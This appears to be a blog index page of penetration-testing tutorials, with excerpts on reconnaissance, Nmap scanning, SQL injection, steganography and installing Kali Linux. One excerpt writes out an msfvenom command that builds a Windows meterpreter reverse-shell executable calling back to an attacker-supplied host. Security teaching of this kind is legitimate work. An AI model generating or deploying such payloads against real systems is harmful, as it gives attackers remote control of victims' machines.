halisans.com

Understanding Footprinting & reconnaissance and Scanning

Install Kali Linux 3 1 1024x576

In this guide, I’ll walk through the practical steps for passive and active footprinting, scanning with Nmap, and using Netdiscover to find endpoints. We’ll simulate a target, www.infocusqa.com, and assume we’re performing an authorized penetration test for an organization. Step 1: Footprinting and Reconnaissance Footprinting is the first step where we gather information about the

Understanding Footprinting & reconnaissance and Scanning Read More »

STEPS INVOLVED IN PERFORMING SQL INJECTION(for educational purposes only)

Install Kali Linux 3 1024x576

Understanding SQL Injection in Penetration Testing SQL Injection is one of the most common and dangerous vulnerabilities in web applications. It occurs when attackers can inject malicious SQL queries into input fields, allowing them to interact directly with the database. This can lead to unauthorized access, data leakage, or even complete control over the database.

STEPS INVOLVED IN PERFORMING SQL INJECTION(for educational purposes only) Read More »

Linux Commands For Beginners

Install Kali Linux 1 1024x576

Welcome to “Linux Commands for Beginners”! In this video, I’ll walk you through some of the most essential Linux commands that are useful for your day-to-day tasks. Whether you’re just getting started with Linux or need a refresher, you’ll learn how to navigate the terminal like a pro. We’ll cover basic commands like adduser to

Linux Commands For Beginners Read More »

Exploiting Windows Machine :Step-by-Step Guide: Creating a Malicious .exe File with msfvenom and Exploiting it using Metasploit

Hqdefault

Step 1: Generating the Malicious .exe File using msfvenom msfvenom is a part of the Metasploit Framework used to generate malicious payloads. Here, we will generate an .exe file designed to reverse connect back to the attacker’s system. Run the following command to create a malicious .exe file: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your-IP-Address> LPORT=<Port> -f exe

Exploiting Windows Machine :Step-by-Step Guide: Creating a Malicious .exe File with msfvenom and Exploiting it using Metasploit Read More »

Understanding Steganography

1 TBgGg5wbAv9yrFvQBHxcLg 1024x479

Steganography is the art and science of concealing information within another non-secret medium, such as an image, audio, or video file. Unlike encryption, which makes the data unreadable without the correct decryption key, steganography hides the existence of the message entirely, making it a powerful tool for covert communication. The concept of steganography dates back

Understanding Steganography Read More »

How to Install Kali Linux on VirtualBox (Windows Host)

In this guide, I’ll walk you through installing Kali Linux on VirtualBox, step by step. We’ll start by checking your Windows system’s requirements, then move on to installing VirtualBox, handling any potential issues, and finally, installing Kali Linux. Let’s get started! 1. System Requirements (Windows Host) Before installing VirtualBox and Kali Linux, ensure your Windows

How to Install Kali Linux on VirtualBox (Windows Host) Read More »